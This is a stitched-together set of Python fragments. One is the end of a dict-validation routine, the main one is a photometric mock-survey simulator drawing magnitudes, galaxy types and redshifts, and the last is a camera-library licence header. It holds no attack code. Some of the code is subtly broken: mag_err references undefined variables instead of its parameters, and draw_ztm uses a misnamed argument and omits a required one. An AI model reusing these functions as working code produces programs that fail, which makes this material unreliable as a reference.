list_of_list_int_properties = [
'_w_dp',
'_l_dp',
'_c_dl',
'_c_lw'
]
list_of_list_bool_properties = [
'_b_dl'
]
list_properties = [
'_c_l'
]
for float_property in float_properties:
if float_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
float_property)
if not isinstance(classifier_data[float_property], float):
raise utils.ValidationError(
'Expected %s to be a float, received %s' % (
float_property, classifier_data[float_property]))
for int_property in int_properties:
if int_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
int_property)
if not isinstance(classifier_data[int_property], int):
raise utils.ValidationError(
'Expected %s to be a int, received %s' % (
int_property, classifier_data[int_property]))
for dict_property in dict_properties:
if dict_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
dict_property)
if not isinstance(classifier_data[dict_property], dict):
raise utils.ValidationError(
'Expected %s to be a dict, received %s' % (
dict_property, classifier_data[dict_property]))
for key, value in classifier_data[dict_property].iteritems():
if not isinstance(key, basestring):
raise utils.ValidationError(
'Expected key of %s to be a string, received %s' % (
dict_property, key))
if not isinstance(value, int):
raise utils.ValidationError(
'Expected value of %s to be a int, received %s' % (
dict_property, value))
for list_property in list_properties:
if list_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
list_property)
if not isinstance(classifier_data[list_property], list):
raise utils.ValidationError(
'Expected %s to be a list, received %s' % (
list_property, classifier_data[list_property]))
for value in classifier_data[list_property]:
if not isinstance(value, int):
raise utils.ValidationError(
'Expected values of %s to be a int, received %s' % (
list_property, value))
for list_of_list_property in list_of_list_int_properties:
if list_of_list_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
list_of_list_property)
if not isinstance(classifier_data[list_of_list_property], list):
raise utils.ValidationError(
'Expected %s to be a list, received %s' % (
list_of_list_property,
classifier_data[list_of_list_property]))
for inner_list in classifier_data[list_of_list_property]:
for value in inner_list:
if not isinstance(value, int):
raise utils.ValidationError(
'Expected values of %s to be a int, received %s' % (
list_of_list_property, value))
for list_of_list_property in list_of_list_bool_properties:
if list_of_list_property not in classifier_data:
raise utils.ValidationError(
'Expected %s to be a key in classifier_data' %
list_of_list_property)
if not isinstance(classifier_data[list_of_list_property], list):
raise utils.ValidationError(
'Expected %s to be a list, received %s' % (
list_of_list_property,
classifier_data[list_of_list_property]))
for inner_list in classifier_data[list_of_list_property]:
for value in inner_list:
if not isinstance(value, bool):
raise utils.ValidationError(
'Expected values of %s to be bool, received %s' % (
list_of_list_property, value))
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Simulate photometric observations.
"""
from __future__ import (print_function, division)
import six
from six.moves import range
import sys
import os
import warnings
import math
import numpy as np
import warnings
from . import priors
from . import reddening
__all__ = ["mag_err", "draw_mag", "draw_type_given_mag",
"draw_redshift_given_type_mag", "draw_ztm", "MockSurvey"]
# Filter lists for pre-set surveys.
_FILTERS = {'cosmos': 'COSMOS.list',
'euclid': 'Euclid.list',
'hsc': 'HSC.list',
'lsst': 'LSST.list',
'sdss': 'SDSS.list'}
# Reference magnitudes for pre-set surveys.
_REFMAGS = {'cosmos': 'i+',
'euclid': 'VIS',
'hsc': 'i',
'lsst': 'r',
'sdss': 'r'}
# Pre-set collection of templates.
_TEMPLATES = {'brown': 'BROWN.list',
'cww+': 'CWWSB4.list',
'polletta+': 'POLLETTASB.list'}
# Pre-set P(z,t,m) priors.
_PRIORS = {'bpz': (priors.pmag, priors.bpz_pt_m, priors.bpz_pz_tm)}
# Pre-set IGM attenuation curves.
_IGM = {'madau+99': reddening.madau_teff}
# Useful constants.
c = 299792458.0 # speed of light in m/s
def mag_err(mag, maglim, sigdet=5., params=(4.56, 1., 1.)):
"""
Compute the magnitude error as a function of a given detection limit
following Rykoff et al. (2015).
Parameters
----------
mag : float or `~numpy.ndarray`
Target magnitude.
maglim : float
Magnitude limit.
sigdet : float, optional
The `sigdet`-sigma detection limit used for `maglim`. Default is `5.`.
params : tuple of shape (3,), optional
Free parameters `(a, b, k)` used in the functional form given by
Rykoff et al. (2015). Default is `(4.56, 1., 1.)`.
Returns
-------
magerr : float or `~numpy.ndarray`
Corresponding magnitude error.
"""
# Set parameters.
a, b, k = params
teff = np.exp(a + b * (maglim - 21.))
# Compute flux/limit.
F = 10**(-0.4 * (m - 22.5))
Flim = 10**(-0.4 * (mlim - 22.5))
# Compute noise.
Fnoise = (Flim / sigmadet)**2 * k * teff - Flim
magerr = 2.5 / np.log(10.) * np.sqrt((1. + Fnoise / F) / (F * k * teff))
return magerr
def draw_mag(Nobj, pmag, rstate=None, pmag_kwargs=None, mbounds=(10, 28),
Npoints=1000):
"""
Draw `Nobj` magnitudes from the P(mag) function :meth:`pmag`.
Parameters
----------
Nobj : int
The number of objects to draw.
pmag : function
The P(mag) function that magnitudes will be drawn from.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
pmag_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude used to truncate :meth:`pmag`. Default is
`(10, 28)`.
Npoints : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF). Default is `1000`.
Returns
-------
mags : `~numpy.ndarray` of shape (Nobj,)
The magnitudes of the simulated objects drawn from :meth:`pmag`.
"""
if pmag_kwargs is None:
pmag_kwargs = dict()
if mbounds[0] >= mbounds[1]:
raise ValueError("The values {0} in `mbounds` are incorrectly "
"ordered.".format(mbounds))
if rstate is None:
rstate = np.random
# Construct the CDF.
mgrid = np.linspace(mbounds[0], mbounds[1], Npoints) # compute mag grid
pdf_m = pmag(mgrid, **pmag_kwargs) # compute P(m) over grid
cdf_m = pdf_m.cumsum() # compute unnormalized CDF F(x)
cdf_m = np.append(0, cdf_m) / cdf_m[-1] # normalize and left-pad F(x)
lpad = 1e-5 * (mbounds[1] - mbounds[0]) # compute left padding for x
mgrid = np.append(mgrid[0] - lpad, mgrid) # left pad x to match F(x)
# Sample from the inverse CDF F^-1(x).
mags = np.interp(rstate.rand(Nobj), cdf_m, mgrid)
return mags
def draw_type_given_mag(p_type_given_mag, mags, Ntypes, rstate=None,
ptm_kwargs=None):
"""
Draw corresponding types from P(type | mag) using the
:meth:`p_type_given_mag` function. Returns a generator.
Parameters
----------
p_type_mag : function
Function that returns the probability of an object's type at a
given magnitude. Output should be an `~numpy.ndarray` with shape
(`Ntypes`,).
mags : iterable of shape (N,)
Set of input magnitudes.
Ntypes : int
The number of types we can draw.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_type_given_mag`.
Returns
-------
types : `~numpy.ndarray` of shape (N,)
The types of the simulated objects drawn from :meth:`p_type_given_mag`
given `mags`.
"""
if ptm_kwargs is None:
ptm_kwargs = dict()
if rstate is None:
rstate = np.random
# Draw types.
types = np.arange(-1, Ntypes)
for i, m in enumerate(mags):
prob = np.array([p_type_given_mag(t, m, **ptm_kwargs)
for t in range(Ntypes)])
cdf = np.append(0., prob).cumsum() # compute augmented CDF
cdf /= cdf[-1] # normalize
draw = int(np.interp(rstate.rand(), cdf, types) + 1) # index
yield draw # pass back draw as a generator
def draw_redshift_given_type_mag(p_z_tm, types, mags, rstate=None,
pztm_kwargs=None, zbounds=(0, 15),
Npoints=1000):
"""
Draw corresponding redshifts from P(z | type, mag) using the
:meth:`p_ztm` function. Returns a generator.
Parameters
----------
p_z_tm : function
Function that takes in `z`, `t`, and `m` and returns a
probability P(z | t, m).
types : iterable of shape (N,)
Set of input types.
mags : iterable of shape (N,)
Set of input magnitudes.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
pztm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_ztm`.
zbounds : tuple of length 2, optional
The minimum/maximum redshift allowed. Default is
`(0, 15)`.
Npoints : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF). Default is `1000`.
Returns
-------
redshifts : `~numpy.ndarray` of shape (Nobj,)
The redshifts of the simulated objects drawn from :meth:`p_ztm`.
"""
if pztm_kwargs is None:
pztm_kwargs = dict()
if zbounds[0] >= zbounds[1]:
raise ValueError("The values {0} in `zbounds` are incorrectly "
"ordered.".format(zbounds))
if rstate is None:
rstate = np.random
# Compute the redshift grid.
zgrid = np.linspace(zbounds[0], zbounds[1], Npoints)
lpad = 1e-5 * (zbounds[1] - zbounds[0]) # compute left padding for z
zgrid2 = np.append(zgrid[0] - lpad, zgrid) # zgrid with left padding
# Draw redshifts.
for i, (t, m) in enumerate(zip(types, mags)):
# Compute PDF.
try:
pdf_z = p_z_tm(z=zgrid, t=t, m=m, **pztm_kwargs)
except:
pdf_z = np.array([p_z_tm(z=z, t=t, m=m, **pztm_kwargs)
for z in zgrid])
# Compute (augmented) CDF.
cdf_z = pdf_z.cumsum()
cdf_z = np.append(0, cdf_z) / cdf_z[-1] # left pad and normalize
# Draw redshift from inverse CDF F^-1(x).
redshift = max(0., np.interp(rstate.rand(), cdf_z, zgrid2))
yield redshift
def draw_ztm(pmag, p_tm, p_ztm, Nobj, pm_kwargs=None, ptm_kwargs=None,
pztm_kwargs=None, mbounds=(10, 28), zbound=(0, 15), Npoints=1000):
"""
Draw `Nobj` redshifts, types, and magnitudes from P(z, type, mag) using the
input P(m) :meth:`pmag`, P(t | m) :meth:`p_tm`, and P(z | t, m)
:meth:`p_ztm` functions.
Parameters
----------
pmag : function
Function that returns P(mag).
p_tm : function
Function that takes in `mag` and returns an `~numpy.ndarray`
of shape (`Ntypes`,) corresponding to P(type | mag).
p_ztm : function
Function that takes in `z`, `t`, and `m` and returns P(z | t, m).
Nobj : int
The number of instances that should be returned.
pm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_tm`.
pztm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_ztm`.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude allowed. Default is
`(10, 28)`.
zbounds : tuple of length 2, optional
The minimum/maximum redshift allowed. Default is
`(0, 15)`.
Npoints : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF). Default is `1000`.
Returns
-------
mags : `~numpy.ndarray` of shape (Nobj,)
Magnitudes of the simulated objects.
types : `~numpy.ndarray` of shape (Nobj,)
Types of the simulated objects.
redshifts : `~numpy.ndarray` of shape (Nobj,)
Redshifts of the simulated objects.
"""
# Draw magnitudes.
mags = np.zeros(Nobj, dtype='float')
mags = draw_mag(Nobj, pmag, pmag_kwargs=pm_kwargs, mbounds=mbounds,
Npoints=Npoints)
# Draw types.
types = np.zeros(Nobj, dtype='int')
for i, t in enumerate(draw_type_given_mag(p_tm, mags,
ptm_kwargs=ptm_kwargs)):
types[i] = t
# Draw redshifts.
redshifts = np.zeros(Nobj, dtype='float')
for i, z in enumerate(draw_redshift_given_type_mag(p_ztm, types, mags,
pztm_kwargs=pztm_kwargs,
zbounds=zbounds,
Npoints=Npoints)):
redshifts[i] = z
return mags, types, redshifts
class MockSurvey(object):
"""
A mock survey object used to generate and store mock data.
Parameters
----------
survey : str, optional
If provided, will initialize the `MockSurvey` using one of several
built-in presets:
* COSMOS (`'cosmos'`),
* *Euclid* (`'euclid'`),
* HSC SSP (`'hsc'`),
* LSST (`'lsst'`), and
* SDSS (`'sdss'`).
templates : str, optional
If provided, will initialize the `MockSurvey` using one of several
built-in template libraries:
* 129 galaxies from Brown et al. (2014) (`'brown'`),
* 8 templates generated using a combination of galaxies
from Coleman, Wu & Weeman (1980) and synthetic spectra from Bruzual
& Charlot (2003) spectral models (`'cww+'`), and
* 31 templates generated using a combination of galaxies from
Polletta et al. (2006) and synthetic spectra from Bruzual & Charlot
(2003) (`'polletta+'`).
prior : str or tuple of shape (3,), optional
If a string provided, will initialize the `MockSurvey` using a preset
P(z, type, mag) prior. Otherwise, if a tuple containing P(mag),
P(type | mag), and P(z | type, mag) functions of the form
`(p_m, p_tm, p_ztm)` is provided, those functions will be initialized
instead. Current presets include:
* The Bayesian Photo-Z (BPZ) prior described in Benitez (2000)
(`'bpz'`).
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
global random state of the `~numpy.random` module will be used.
"""
def __init__(self, survey=None, templates=None, prior=None, rstate=None):
# filters
self.filters = None
self.NFILTER = None
self.ref_filter = None
# templates
self.templates = None
self.NTEMPLATE = None
self.TYPES = None
self.TYPE_COUNTS = None
self.NTYPE = None
# priors
self.pm = None
self.ptm = None
self.pztm = None
# mock data
self.data = None
if survey is not None:
if survey in _FILTERS:
self.load_survey(survey)
self.set_refmag(_REFMAGS[survey])
else:
raise ValueError("{0} does not appear to be valid survey "
"preset.".format(survey))
if templates is not None:
if templates in _TEMPLATES:
self.load_templates(templates)
else:
raise ValueError("{0} does not appear to be valid template "
"preset.".format(templates))
if prior is not None:
if prior in _PRIORS:
self.load_prior(prior)
else:
raise ValueError("{0} does not appear to be valid prior "
"preset.".format(prior))
if rstate is None:
self.rstate = np.random
def load_survey(self, filter_list, path='', Npoints=5e4):
"""
Load an input filter list and associated depths for a particular
survey. Results are stored internally under `filters`.
Parameters
----------
filter_list : str
A list of filters to import. This can be a string from a
collection of built-in surveys or a corresponding file in the
proper format (see `frankenz/filters/README.txt`).
path : str, optional
The filepath appended to `filter_list`. Also used to search for
filters. If `filter_list` is one of the pre-specified options
above, this defaults to `None`.
Npoints : int, optional
The number of points used to interpolate the filter transmission
curves when computing the effective wavelength. Default is `5e4`.
"""
# Get filter list.
try:
filter_list = _FILTERS[filter_list]
path = os.path.dirname(os.path.realpath(__file__)) + '/filters/'
except:
pass
# Load filter list.
f = open(path + filter_list)
self.filters = []
filter_paths = []
for line in f:
index, name, fpath, fdepth_mag = line.split()
fdepth_mag = float(fdepth_mag)
fdepth_flux = 10**((fdepth_mag - 23.9) / -2.5) / 5. # noise [uJy]
fltr = {'index': int(index), 'name': name,
'depth_mag5sig': fdepth_mag, 'depth_flux1sig': fdepth_flux}
self.filters.append(fltr)
filter_paths.append(fpath)
f.close()
self.NFILTER = len(self.filters) # number of filters
# Extract filters.
for fpath, fltr in zip(filter_paths, self.filters):
wavelength, transmission = np.loadtxt(path + fpath).T
fltr['wavelength'] = wavelength
fltr['transmission'] = transmission
fltr['frequency'] = c / (1e-10 * wavelength)
# Compute effective wavelengths.
for fltr in self.filters:
nuMax = 0.999 * c / (min(fltr['wavelength']) * 1e-10) # max nu
nuMin = 1.001 * c / (max(fltr['wavelength']) * 1e-10) # min nu
nu = np.linspace(nuMin, nuMax, Npoints) # frequency array
lnu = np.log(nu) # ln(frequency)
wave = c / nu # convert to wavelength
lwave = np.log(wave) # ln(wavelength)
trans = np.interp(1e10 * wave, fltr['wavelength'],
fltr['transmission']) # interp transmission
lambda_eff = np.exp(np.trapz(trans * lwave, lnu) /
np.trapz(trans, lnu)) * 1e10 # integrate
fltr['lambda_eff'] = lambda_eff
def load_templates(self, template_list, path='', wnorm=7000.):
"""
Load an input template list. Results are stored internally under
`templates`.
Parameters
----------
template_list : str
A list of templates to import. This can be a string from a
collection of built-in template lists or a corresponding file in
the proper format (see `frankenz/templates/README.txt`).
path : str, optional
The filepath appended to `template_list`. Also used to search for
templates. If `template_list` is one of the pre-specified options
above, this defaults to `None`.
wnorm : float, optional
The "pivot wavelength" [A] where templates will be normalized.
Default is `7000.`.
"""
# Get template list.
try:
template_list = _TEMPLATES[template_list]
path = os.path.dirname(os.path.realpath(__file__)) + '/seds/'
except:
pass
# Load template list.
f = open(path + template_list)
self.templates = []
template_paths = []
for line in f:
index, name, obj_type, fpath = line.split()
tmp = {'index': int(index), 'name': name, 'type': obj_type}
self.templates.append(tmp)
template_paths.append(fpath)
f.close()
self.NTEMPLATE = len(self.templates) # number of templates
# Divide our templates into groups.
ttypes = [t['type'] for t in self.templates]
_, idx, self.TYPE_COUNTS = np.unique(ttypes, return_index=True,
return_counts=True)
self.TYPES = np.array(ttypes)[np.sort(idx)]
if len(self.TYPES) == 1: # if no types provided, all are unique
self.TYPES = np.arange(self.NTEMPLATE).astype('str')
self.TYPE_COUNTS = np.ones(self.NTEMPLATE)
self.NTYPE = len(self.TYPES)
self.TTYPE = np.array([np.arange(self.NTYPE)[t['type'] == self.TYPES]
for t in self.templates], dtype='int').flatten()
# Extract templates.
for fpath, tmp in zip(template_paths, self.templates):
wavelength, flambda = np.loadtxt(path + fpath).T
tmp['wavelength'] = wavelength
tmp['frequency'] = c / (1e-10 * wavelength)
tmp['flambda'] = flambda
tmp['fnu'] = (wavelength * 1e-10)**2 / c * (flambda * 1e10)
# Normalize flux densities at the pivot wavelength.
for tmp in self.templates:
tmp['flambda'] /= np.interp(wnorm, tmp['wavelength'],
tmp['flambda'])
tmp['fnu'] /= np.interp(wnorm, tmp['wavelength'], tmp['fnu'])
def load_prior(self, prior):
"""
Load the P(z, t, m) prior characterizing the mock survey. Results are
stored internally under `pm`, `ptm`, and `pztm`.
Parameters
----------
prior : str or tuple of shape (3,), optional
If a string provided, will initialize the `MockSurvey` using a
preset P(z, type, mag) prior. Otherwise, if a tuple containing
P(mag), P(type | mag), and P(z | type, mag) functions of the form
`(p_m, p_tm, p_ztm)` is provided, those will be initialized.
"""
try:
self.pm, self.ptm, self.pztm = _PRIORS[prior]
except:
self.pm, self.ptm, self.pztm = prior
def set_refmag(self, ref, mode='name'):
"""
Set the reference magnitude used by the magnitude prior P(mag).
Results are stored internally under `ref_filter`.
Parameters
----------
ref : str or int
Either the name, index, or counter (native position in list) of
the filter.
mode : {`'name'`, `'index'`, `'counter'`}
Whether to search among the provided names/indices (from the
`filter_list` file) or the native position in the filters in the
stored list. Default is `'name'`.
"""
if mode not in {'name', 'index', 'counter'}:
raise ValueError("{0} is not an allowed category.".format(mode))
if mode == 'counter':
self.ref_filter = ref
else:
sel = [fltr[mode] == ref for fltr in self.filters]
if len(sel) == 0:
raise ValueError("{0} does not match any {1} among the "
"filters.".format(ref, mode))
self.ref_filter = np.arange(self.NFILTER)[sel][0]
def sample_params(self, Nobj, rstate=None, mbounds=None, zbounds=(0, 15),
Nm=1000, Nz=1000, pm_kwargs=None, ptm_kwargs=None,
pztm_kwargs=None, verbose=True):
"""
Draw `Nobj` samples from the joint P(z, t, m) prior. Results are
stored internally under `data`.
Parameters
----------
Nobj : int
The number of objects to be simulated.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude allowed. Default is `(10,
maglim + 2.5 * np.log10(5))` where `maglim` is the 5-sigma limiting
magnitude in the reference filter.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
random state used to initialize the `MockSurvey` object will be
used.
zbounds : tuple of length 2, optional
The minimum/maximum redshift allowed. Default is `(0, 10)`.
Nm : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample magnitudes.
Default is `1000`.
Nz : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample redshifts.
Default is `1000`.
pm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_tm`.
pztm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_ztm`.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
if pm_kwargs is None:
pm_kwargs = dict()
if ptm_kwargs is None:
ptm_kwargs = dict()
if pztm_kwargs is None:
pztm_kwargs = dict()
if rstate is None:
rstate = self.rstate
maglim = pm_kwargs.get('maglim',
self.filters[self.ref_filter]['depth_mag5sig'])
pm_kwargs['maglim'] = maglim # get 5-sigma limiting reference mag
if mbounds is None:
mbounds = (10, pm_kwargs['maglim'] + 2.5 * np.log10(5))
# Sample magnitudes.
if verbose:
sys.stderr.write('Sampling mags: ')
sys.stderr.flush()
mags = np.zeros(Nobj, dtype='float')
mags = draw_mag(Nobj, self.pm, pmag_kwargs=pm_kwargs, rstate=rstate,
mbounds=mbounds, Npoints=Nm) # sample magnitudes
if verbose:
sys.stderr.write('{0}/{1}'.format(Nobj, Nobj))
sys.stderr.flush()
# Sample types.
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
types = np.zeros(Nobj, dtype='int')
generator = draw_type_given_mag # alias for generator
for i, t in enumerate(generator(self.ptm, mags, self.NTYPE,
ptm_kwargs=ptm_kwargs,
rstate=rstate)):
types[i] = t # assign type draw
if verbose:
sys.stderr.write('\rSampling types: {0}/{1}'
.format(i+1, Nobj))
sys.stderr.flush()
# Re-label templates by type and construct probability vectors.
tmp_types = np.array([tmp['type'] for tmp in self.templates])
tmp_p = [np.array(t == tmp_types, dtype='float') / sum(t == tmp_types)
for t in self.TYPES]
# Sample templates from types.
templates = np.empty(Nobj, dtype='int')
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
for i in range(self.NTYPE):
n = int(sum(types == i)) # number of objects of a given type
templates[types == i] = rstate.choice(self.NTEMPLATE, size=n,
p=tmp_p[i])
if verbose:
sys.stderr.write('\rSampling templates within each type: '
'{0}/{1}'.format(i+1, self.NTYPE))
sys.stderr.flush()
# Sample redshifts.
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
redshifts = np.zeros(Nobj, dtype='float')
generator = draw_redshift_given_type_mag
for i, z in enumerate(generator(self.pztm, types, mags,
pztm_kwargs=pztm_kwargs,
zbounds=zbounds, Npoints=Nz,
rstate=rstate)):
redshifts[i] = z # assign redshift draw
if verbose:
sys.stderr.write('\rSampling redshifts: {0}/{1}'
.format(i+1, Nobj))
sys.stderr.flush()
if verbose:
sys.stderr.write('\n')
sys.stderr.flush()
# Save data.
self.data = {'refmags': mags, 'types': types,
'templates': templates, 'redshifts': redshifts}
self.NOBJ = Nobj
def sample_phot(self, red_fn='madau+99', rnoise_fn=None, rstate=None,
verbose=True):
"""
Generate noisy photometry from `(t, z, m)` samples. **Note that this
ignores Poisson noise**. Results are added internally to `data`.
Parameters
----------
red_fn : function, optional
A function that adds in reddening from the intergalactic medium
(IGM). Default is `'madau+99'`, which uses the parametric form
from Madau et al. (1999). If `None` is passed, no reddening will
be applied.
rnoise_fn : function, optional
A function that takes the average noise (computed from the
provided survey depths) and jitters them to mimic spatial
background variation.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
random state used to initialize the `MockSurvey` object will be
used.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
if rstate is None:
rstate = self.rstate
# Grab data.
try:
mags = self.data['refmags']
types = self.data['types']
templates = self.data['templates']
redshifts = self.data['redshifts']
except:
raise ValueError("No mock data has been generated.")
# Extract reddening function.
try:
red_fn = _IGM[red_fn]
except:
pass
# Initialize useful quantities.
tlw = [np.log(t['wavelength']) for t in self.templates] # ln(tmp wave)
flw = [np.log(f['wavelength']) for f in self.filters] # ln(flt wave)
filt_nu = [f['frequency'] for f in self.filters] # filt nu
filt_t = [f['transmission'] for f in self.filters] # filt nu
norm = [np.trapz(ft / fn, fn)
for ft, fn in zip(filt_t, filt_nu)] # filter normalization
tfnu = [t['fnu'] for t in self.templates]
# Compute unnormalized photometry.
phot = np.zeros((self.NOBJ, self.NFILTER)) # photometry array
for i, (t, z) in enumerate(zip(templates, redshifts)):
# Compute reddening.
if red_fn is not None:
igm_teff = [red_fn(np.exp(f_lw), z) for f_lw in flw]
else:
igm_teff = [np.ones_like(f_lw) for f_lw in flw]
# Integrate the flux over the filter. Interpolation is performed
# using the arcsinh transform for improved numerical stability.
phot[i] = [np.trapz(np.sinh(np.interp(f_lw, tlw[t] + np.log(1 + z),
np.arcsinh(tfnu[t]))) *
f_t / f_nu * te, f_nu) / f_n
for f_t, f_nu, f_lw, f_n, te in zip(filt_t, filt_nu,
flw, norm,
igm_teff)]
if verbose:
sys.stderr.write('\rGenerating photometry: {0}/{1}'
.format(i+1, self.NOBJ))
sys.stderr.flush()
# Normalize photometry to reference magnitude.
with warnings.catch_warnings():
warnings.simplefilter('ignore')
fluxes = 10**((mags - 23.9) / -2.5) # convert to flux
phot /= phot[:, self.ref_filter][:, None] # norm to ref_flux=1.
phot *= fluxes[:, None] # multiply by actual ref_flux value
# Deal with "bad" (nonsensical) photometry.
sel_badphot = np.unique(np.nonzero(~np.isfinite(phot))[0])
self.data['refmags'][sel_badphot] = np.inf # fix magnitudes
phot[sel_badphot] = -np.inf # fix fluxes
# Compute errors.
if verbose:
sys.stderr.write('\nSampling errors: ')
sys.stderr.flush()
fnoise = np.array([np.ones(self.NOBJ) * f['depth_flux1sig']
for f in self.filters]).T
if rnoise_fn is not None:
fnoise = rnoise_fn(fnoise, rstate=rstate) # add noise variability
if verbose:
sys.stderr.write('{0}/{1}'.format(self.NOBJ, self.NOBJ))
sys.stderr.flush()
# Jittering fluxes.
if verbose:
sys.stderr.write('\nSampling photometry: ')
sys.stderr.flush()
phot_obs = rstate.normal(phot, fnoise)
if verbose:
sys.stderr.write('{0}/{1}\n'.format(self.NOBJ, self.NOBJ))
sys.stderr.flush()
# Save results.
self.data['phot_true'] = phot
self.data['phot_obs'] = phot_obs
self.data['phot_err'] = fnoise
def make_mock(self, Nobj, mbounds=None, zbounds=(0, 15),
Nm=1000, Nz=1000, pm_kwargs=None, ptm_kwargs=None,
pztm_kwargs=None, red_fn='madau+99', rnoise_fn=None,
rstate=None, verbose=True):
"""
Generate (noisy) photometry for `Nobj` objects sampled from the
prior. Wraps :meth:`sample_params` and :meth:`sample_phot`. Results are
stored internally under `data`.
Parameters
----------
Nobj : int
The number of objects to be simulated.
mbounds : tuple of length 2, optional
The minimum/maximum magnitude allowed. Default is `(10,
maglim + 2.5 * np.log10(5))` where `maglim` is the 5-sigma limiting
magnitude in the reference filter.
zbounds : tuple of length 2, optional
The minimum/maximum redshift allowed. Default is `(0, 10)`.
Nm : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample magnitudes.
Default is `1000`.
Nz : int, optional
The number of points used when interpolating the inverse cumulative
distribution function (CDF) to sample redshifts.
Default is `1000`.
pm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`pmag`.
ptm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_tm`.
pztm_kwargs : dict, optional
Additional keyword arguments to be passed to :meth:`p_ztm`.
red_fn : function, optional
A function that adds in reddening from the intergalactic medium
(IGM). Default is `'madau+99'`, which uses the parametric form
from Madau et al. (1999). If `None` is passed, no reddening will
be applied.
rnoise_fn : function, optional
A function that takes the average noise (computed from the
provided survey depths) and jitters them to mimic spatial
background variation.
rstate : `~numpy.random.RandomState`, optional
`~numpy.random.RandomState` instance. If not given, the
random state used to initialize the `MockSurvey` object will be
used.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
# Sample parameters.
self.sample_params(Nobj, mbounds=mbounds, zbounds=zbounds,
Nm=Nm, Nz=Nz, pm_kwargs=pm_kwargs, rstate=rstate,
ptm_kwargs=ptm_kwargs, pztm_kwargs=pztm_kwargs,
verbose=verbose)
# Sample photometry.
self.sample_phot(red_fn=red_fn, rnoise_fn=rnoise_fn,
rstate=rstate, verbose=verbose)
def make_model_grid(self, redshifts, red_fn='madau+99', verbose=True):
"""
Generate photometry for input set of templates over the input
`redshifts` grid. Results are stored internally under `models` as an
`(Nz, Nt, Nf)` `~numpy.ndarray` with `Nz` redshifts, `Nt` templates,
and `Nf` filters.
Parameters
----------
redshifts : iterable of shape (N,)
Input redshift grid.
red_fn : function, optional
A function that adds in reddening from the intergalactic medium
(IGM). Default is `'madau+99'`, which uses the parametric form
from Madau et al. (1999). If `None` is passed, no reddening will
be applied.
verbose : bool, optional
Whether to print progress to `~sys.stderr`. Default is `True`.
"""
Nz = len(redshifts)
# Extract reddening function.
try:
red_fn = _IGM[red_fn]
except:
pass
# Initialize useful quantities.
tlw = [np.log(t['wavelength']) for t in self.templates] # ln(tmp wave)
flw = [np.log(f['wavelength']) for f in self.filters] # ln(flt wave)
filt_nu = [f['frequency'] for f in self.filters] # filt nu
filt_t = [f['transmission'] for f in self.filters] # filt nu
norm = [np.trapz(ft / fn, fn)
for ft, fn in zip(filt_t, filt_nu)] # filter normalization
tfnu = [t['fnu'] for t in self.templates]
# Compute unnormalized photometry.
phot = np.zeros((Nz, self.NTEMPLATE, self.NFILTER))
for i, z in enumerate(redshifts):
for j in range(self.NTEMPLATE):
# Compute reddening.
if red_fn is not None:
igm_teff = [red_fn(np.exp(f_lw), z) for f_lw in flw]
else:
igm_teff = [np.ones_like(f_lw) for f_lw in flw]
# Integrate the flux over the filter. Interpolation is done
# using the arcsinh transform for improved numerical stability.
phot[i, j] = [np.trapz(f_t / f_nu * te *
np.sinh(np.interp(f_lw, tlw[j] +
np.log(1 + z),
np.arcsinh(tfnu[j]))),
f_nu) / f_n
for f_t, f_nu, f_lw, f_n, te in zip(filt_t,
filt_nu,
flw, norm,
igm_teff)]
if verbose:
sys.stderr.write('\rGenerating model photometry grid: {0}/{1}'
.format(i+1, len(redshifts)))
sys.stderr.flush()
# Save results.
self.models = {'data': phot, 'zgrid': redshifts}
|
|
# vim: set et sw=4 sts=4 fileencoding=utf-8:
#
# Python camera library for the Rasperry-Pi camera module
# Copyright (c) 2013-2017 Dave Jones <[email protected]>
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
